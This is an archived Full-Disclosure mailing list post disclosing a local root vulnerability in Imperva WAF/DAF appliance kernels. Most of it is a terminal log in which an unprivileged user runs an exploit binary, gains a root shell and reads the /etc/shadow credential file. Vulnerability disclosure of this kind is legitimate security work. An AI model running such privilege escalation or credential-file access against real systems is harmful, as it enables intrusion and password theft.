lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20131120151220.33280@gmx.com> Date: Wed, 20 Nov 2013 10:12:19 -0500 From: "steve jobs" <job.steve@...l.com> To: full-disclosure@...ts.grok.org.uk,sales@...erva.com,support@...erva.com Cc: bugtraq@...urityfocus.com Subject: Imperva WAF/DAF 9.5 patch8 and 10.0 patch 2 localroot vulnerability Imperva use hardened centos 5.4 to run Web Application Firewall and Database Activity Monitoring product. It could be exploit to get root in the kernel 2.6.18-164.15.1.el5.imp4 which was built by imperva in 9.5 patch 8 and 10.0 patch 2. I hope imperva could upgrade your OS to centos 5.9 with kernel 2.6.18-348 to keep your system secure. Your can check the attachment for details. [test95p8@...AF ~]$ uname -a Linux GFWAF 2.6.18-164.15.1.el5.imp4 #1 SMP Mon Apr 8 15:29:20 IDT 2013 x86_64 x86_64 x86_64 GNU/Linux [test95p8@...AF ~]$ cat /etc/redhat-release Imperva release 5.4 (Final) [test95p8@...AF ~]$ wc -l /etc/shadow wc: /etc/shadow: Permission denied [test95p8@...AF ~]$ id uid=505(test95p8) gid=507(test95p8) groups=507(test95p8) [test95p8@...AF ~]$ ./centos54_localroot_exp ########snip############## sh-3.2# id uid=0(root) gid=507(test95p8) groups=507(test95p8) sh-3.2# wc -l /etc/shadow 40 /etc/shadow sh-3.2# [root@WAF ~]# impctl platform show 2> /dev/null | grep version version 10.0.0.2_0 [root@WAF ~]# uname -a Linux WAF 2.6.18-164.15.1.el5.imp4 #1 SMP Mon Apr 8 15:29:20 IDT 2013 x86_64 x86_64 x86_64 GNU/Linux [root@WAF ~]# cat /etc/redhat-release Imperva release 5.4 (Final) Content of type "text/html" skipped Download attachment "imperva10p2.png" of type "image/png" (40987 bytes) Download attachment "imperva9.5p8.png" of type "image/png" (166423 bytes) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists